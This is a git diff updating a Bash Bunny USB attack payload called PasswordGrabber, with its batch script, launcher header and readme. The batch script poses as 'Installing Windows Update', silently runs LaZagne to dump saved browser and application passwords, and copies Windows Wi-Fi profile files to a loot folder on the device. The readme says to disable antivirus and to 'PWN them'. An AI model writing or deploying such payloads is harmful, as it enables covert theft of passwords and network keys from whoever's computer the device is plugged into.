diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd index 5dbc35bd..27792067 100644 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ b/payloads/library/credentials/PasswordGrabber/e.cmd @@ -1,34 +1,20 @@ @echo off @echo Installing Windows Update -REM Delete registry keys storing Run dialog history -REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f - -REM Creates directory compromised of computer name, date and time -REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious - -REM This executes LaZagne in the current directory and outputs the password file to Loot -REM Time and Date is also added setlocal cd /d %~dp0 -%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" -REM These lines if you just want Passwords and no files. -set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% +REM Time and Date +set drec=%COMPUTERNAME%_%date%_%TIME: =0% +set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec% mkdir %dst% >>nul -if Exist %USERPROFILE%\Documents ( -REM /C Continues copying even if errors occur. -REM /Q Does not display file names while copying. -REM /G Allows the copying of encrypted files to destination that does not support encryption. -REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. -REM /E Copies directories and subdirectories, including empty ones. +REM This executes LaZagne in the current directory and outputs the password file to Loot +%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt" -REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul - -REM Same as above but does not create empty directories -REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul +if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( +xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul ) REM Blink CAPSLOCK key diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 4cc20386..797dab41 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -1,15 +1,15 @@ #!/bin/bash # -# Title: USB Exfiltrator -# Author: Hak5Darren -# Version: 1.1 -# Target: Windows XP SP3+ -# Props: Diggster, IMcPwn -# Category: Exfiltration +# Title: Password Grabber +# Author: Razerblade +# Version: 1.2 +# Target: Windows +# Props: Hak5Darren, TeCHemically, dragmus31 +# Category: Credentials # # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs -# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. +# which in turn steals credentials by using LaZagne and saves them to /Loot # LED SETUP GET SWITCH_POSITION diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index b9f0efb8..18129740 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md @@ -1,25 +1,33 @@ # PasswordGrabber * Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ -* Version: Version 1.1 -* Firmware support: 1.1 -* Target: Windows +* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31 +* Version: Version 1.2 +* Firmware support: 1.1+ +* Target: Windows 7+ ## Description Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. + Full read here: https://github.com/AlessandroZ/LaZagne +Downloads here: https://github.com/AlessandroZ/LaZagne/releases ## Configuration +1. You need to download the latest file from LaZagnes release page. +2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe +3. Plug it in a computer and PWN them. + +Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. + +## INFO By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy - -Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne -When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go! +## DISCLAIMER +Hak5 is not responsible for the execution of 3rd party binaries. ## STATUS | LED | Status | @@ -28,5 +36,5 @@ When compiled or downloaded, just drop it of to the PasswordGrabbers folder and | Green | Attack Complete | ## Discussion -[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/